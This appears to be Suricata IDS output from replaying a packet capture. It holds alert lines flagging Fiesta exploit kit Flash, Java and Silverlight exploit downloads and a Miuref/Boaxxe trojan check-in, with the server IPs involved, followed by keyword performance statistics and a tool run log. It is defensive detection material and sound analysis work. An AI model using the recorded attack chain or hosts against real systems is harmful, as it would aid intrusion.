12/08/2014-23:18:54.673292  [**] [1:2018411:2] ET CURRENT_EVENTS Fiesta Flash Exploit Download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49280
12/08/2014-23:18:54.673292  [**] [1:2020981:3] ET CURRENT_EVENTS Fiesta EK Flash Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49280
12/08/2014-23:18:55.229241  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49282 -> 205.234.186.111:80
12/08/2014-23:18:55.250555  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49283 -> 205.234.186.111:80
12/08/2014-23:18:57.696333  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49284 -> 205.234.186.111:80
12/08/2014-23:19:00.049065  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49285 -> 205.234.186.111:80
12/08/2014-23:19:02.396437  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49286 -> 205.234.186.111:80
12/08/2014-23:19:04.936491  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49287 -> 205.234.186.111:80
12/08/2014-23:19:09.779789  [**] [1:2019683:6] ET TROJAN Miuref/Boaxxe Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49288 -> 209.239.112.229:80
12/08/2014-23:19:21.715674  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49289 -> 205.234.186.111:80
12/08/2014-23:19:24.107376  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49290 -> 205.234.186.111:80
12/08/2014-23:19:24.747148  [**] [1:2011582:52] ET POLICY Vulnerable Java Version 1.6.x Detected [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.204.137:49291 -> 205.234.186.111:80
12/08/2014-23:19:24.747148  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49291 -> 205.234.186.111:80
12/08/2014-23:19:25.000784  [**] [1:2014473:5] ET INFO JAVA - Java Archive Download By Vulnerable Client [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.000784  [**] [1:2020983:3] ET CURRENT_EVENTS Fiesta EK Java Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.000784  [**] [1:2017639:7] ET INFO JAR Size Under 30K Size - Potentially Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.954909  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:25.954909  [**] [1:2011582:52] ET POLICY Vulnerable Java Version 1.6.x Detected [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:25.954909  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:28.427266  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49293 -> 205.234.186.111:80
12/08/2014-23:19:28.427266  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49293 -> 205.234.186.111:80
12/08/2014-23:19:32.265978  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49294 -> 205.234.186.111:80
12/08/2014-23:19:34.697012  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49295 -> 205.234.186.111:80
12/08/2014-23:24:27.901753  [**] [1:2018409:2] ET CURRENT_EVENTS Fiesta SilverLight Exploit Download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49283
12/08/2014-23:24:27.901753  [**] [1:2020982:3] ET CURRENT_EVENTS Fiesta EK SilverLight Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49283


keyword_perf.log - (16014 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/16/2018 -- 14:57:21
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17008142        5269            5269            64251           3227.00         3227.00         0.00           
  threshold        26803           4               3               7666            6700.00         6854.00         6239.00        
  content          42832202        6299            3073            2495098         6799.00         6647.00         6944.00        
  pcre             23426830        1861            169             15630169        12588.00        5569.00         13289.00       
  byte_test        544206          167             70              10889           3258.00         3604.00         3009.00        
  byte_jump        15403           4               0               4859            3850.00         0.00            3850.00        
  isdataat         49008           15              1               7852            3267.00         2617.00         3313.00        
  flowbits         1392382         437             103             77370           3186.00         3159.00         3194.00        
  urilen           3075557         932             271             58769           3299.00         3365.00         3273.00        
  byte_extract     16809           1               1               16809           16809.00        16809.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17008142        5269            5269            64251           3227.00         3227.00         0.00           
  flowbits         1261546         403             69              77370           3130.00         2820.00         3194.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3028761         748             290             46914           4049.00         3984.00         4090.00        
  pcre             116511          32              0               13363           3640.00         0.00            3640.00        
  byte_test        514491          160             68              10889           3215.00         3532.00         2981.00        
  byte_jump        15403           4               0               4859            3850.00         0.00            3850.00        
  isdataat         46391           14              0               7852            3313.00         0.00            3313.00        
  byte_extract     16809           1               1               16809           16809.00        16809.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         130836          34              34              6355            3848.00         3848.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        26803           4               3               7666            6700.00         6854.00         6239.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2720324         703             257             39223           3869.00         4010.00         3788.00        
  pcre             18106580        573             35              15630169        31599.00        6486.00         33233.00       
  isdataat         2617            1               1               2617            2617.00         2617.00         0.00           
  urilen           3075557         932             271             58769           3299.00         3365.00         3273.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          168774          33              22              25169           5114.00         5513.00         4315.00        
  pcre             4501            1               1               4501            4501.00         4501.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          296263          99              0               7791            2992.00         0.00            2992.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21659283        1333            367             421236          16248.00        20223.00        14738.00       
  pcre             4290961         1112            30              193636          3858.00         5044.00         3825.00        
  byte_test        22668           6               1               5069            3778.00         5069.00         3519.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4790184         1210            591             99687           3958.00         4277.00         3654.00        
  pcre             908277          143             103             27759           6351.00         5421.00         8746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1228050         336             230             50729           3654.00         3872.00         3183.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          37823           11              11              3591            3438.00         3438.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          37721           11              11              3809            3429.00         3429.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  byte_test        7047            1               1               7047            7047.00         7047.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3461            1               1               3461            3461.00         3461.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35526           11              11              3452            3229.00         3229.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          357095          116             101             4493            3078.00         3086.00         3022.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8398571         1665            1159            2495098         5044.00         5853.00         3190.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          70366           22              22              3557            3198.00         3198.00         0.00           


IDSDeathBlossom.py.log - (1151 bytes) - download
2018-11-16 14:57:11,964 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-16 14:57:12,717 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-16 14:57:12,717 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2018-11-16 14:57:12,717 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-16 14:57:12,717 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-16 14:57:12,717 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/4c58c645061d62e63195d3f25b9611f1d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1456-Variant2.pcap -vvv -k none
2018-11-16 14:57:21,120 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-16 14:57:21,120 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 9.16506505013